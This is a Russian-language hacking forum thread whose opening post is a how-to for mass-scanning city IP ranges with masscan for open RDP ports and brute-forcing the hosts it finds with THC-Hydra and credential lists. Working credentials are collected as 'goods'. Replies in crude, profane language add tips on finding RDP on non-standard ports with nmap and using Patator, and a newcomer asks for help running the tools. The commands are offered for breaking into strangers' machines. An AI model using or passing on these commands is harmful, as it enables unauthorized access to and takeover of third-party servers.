Брутим дедики на Linux!

IMR3ON

BASKET.BRO
Статус
offline
Регистрация
15.05.2019
Сообщения
515
Репутация
223
⁣Telegram
Откроем консоль,установим!

Установка masscan в Debian, Mint, Ubuntu
sudo apt-get install git gcc make libpcap-dev
git clone https://github.com/robertdavidgraham/masscan
cd masscan
make
Установка Трехглавый и зависимостей
sudo apt-get install libssl-dev libssh-dev libidn11-dev libpcre3-dev libgtk2.0-dev libmysqlclient-dev libpq-dev libsvn-dev firebird2.1-dev libncp-dev
git clone https://github.com/vanhauser-thc/thc-Трехглавый.git
cd thc-Трехглавый/
./configure
make
sudo make install

Начнем.. Теперь нам понадобятся цели, я возьму ip диапазон для скана портов на сайте IP диапазоны городов и сохраню в домашний каталог в файл iprdp.txt
Теперь ip диапазон который взяли будем сканить дефолтный порт RDP 3389

masscan -iL iprdp.txt --open -p3389 -oL result.txt

Если нужен чистый список одних ip без мусора для масс брута то будет так
masscan -iL iprdp.txt --open -p3389 | awk '{print $6}' > result.txt

-oL - результат
-iL - файл с диапазонами которые будем сканить
--open - только открытые порты
-p - порт который сканить
мусора в домашний каталог в файл result.txt
Скан закончился, нашел 6 штук с открытым портом RDP, смотрим файл result.txt это будут наши таргеты!
Теперь нам необходимо взять логины и пароли которые дадим Гидре. Скачать можете ТУТ

Итак приступим к бруту! Вводим следующую команду.
Трехглавый -L loginr.txt -P passrdp.txt -M result.txt -s 3389 rdp vV -o GOODRDP.txt
-L - список логинов , -l один логин
-P - список паролей
-M -файл список целей
-V - вывод в пары логин и пароль в консоль при каждой попытке
Другие ключи можете посмотреть командой Трехглавый -hh
-o - файл куда сохранятся гуды!
 

Вложения

  • Снимок экрана от 2020-04-12 21-55-26.png
    Снимок экрана от 2020-04-12 21-55-26.png
    201.3 KB · Просмотры: 224

nerusru

Резидент
Статус
offline
Регистрация
03.08.2016
Сообщения
184
Репутация
151
Ну блять хуй знает на самом деле.
Я думаю лучше сначала диапазон прогнать нмапом и посмотреть рдп на других портах. Зачастую админы вешают рдп на другие порты и думают, что ахуенно защитились, а нмап умеет определять, что висит на порту.
А 3389 сейчас брутит блять вся школота, комп висит с внешним адресом, смотрю лог безопасности - там пиздец полный, Такое ощущние, что брутят все по одному словарю. Тоже мне, брутеры ебаный ты в рот.
 

IMR3ON

BASKET.BRO
Статус
offline
Регистрация
15.05.2019
Сообщения
515
Репутация
223
⁣Telegram
Ну блять хуй знает на самом деле.
Я думаю лучше сначала диапазон прогнать нмапом и посмотреть рдп на других портах. Зачастую админы вешают рдп на другие порты и думают, что ахуенно защитились, а нмап умеет определять, что висит на порту.
А 3389 сейчас брутит блять вся школота, комп висит с внешним адресом, смотрю лог безопасности - там пиздец полный, Такое ощущние, что брутят все по одному словарю. Тоже мне, брутеры ебаный ты в рот.
Да я знаю, это изи, пока так пойдет, нмапом тож можно, а так вообще брутить удобнее и более обширные настройки имеет Patator, лично мне он привычнее и удобнее и стабильнее
 

lolk1n

Новичок
Статус
offline
Регистрация
10.06.2022
Сообщения
6
Репутация
0
└─$ masscan -iL ip2.txt --open -p3389 -oL result.txt
[-] FAIL: permission denied
[hint] need to sudo or run as root or something
[-] if:eth0:init: failed
с линухой вообще на ты айте пинка пжл чего не так то
 

lolk1n

Новичок
Статус
offline
Регистрация
10.06.2022
Сообщения
6
Репутация
0
проблему решил надо было написать sudo перед запуском
 

lolk1n

Новичок
Статус
offline
Регистрация
10.06.2022
Сообщения
6
Репутация
0
вопрос в другом а как запустить на ипв6?
 

lolk1n

Новичок
Статус
offline
Регистрация
10.06.2022
Сообщения
6
Репутация
0
Ну блять хуй знает на самом деле.
Я думаю лучше сначала диапазон прогнать нмапом и посмотреть рдп на других портах. Зачастую админы вешают рдп на другие порты и думают, что ахуенно защитились, а нмап умеет определять, что висит на порту.
А 3389 сейчас брутит блять вся школота, комп висит с внешним адресом, смотрю лог безопасности - там пиздец полный, Такое ощущние, что брутят все по одному словарю. Тоже мне, брутеры ебаный ты в рот.
был бы очень признателен если бы вы об этом рассказали))))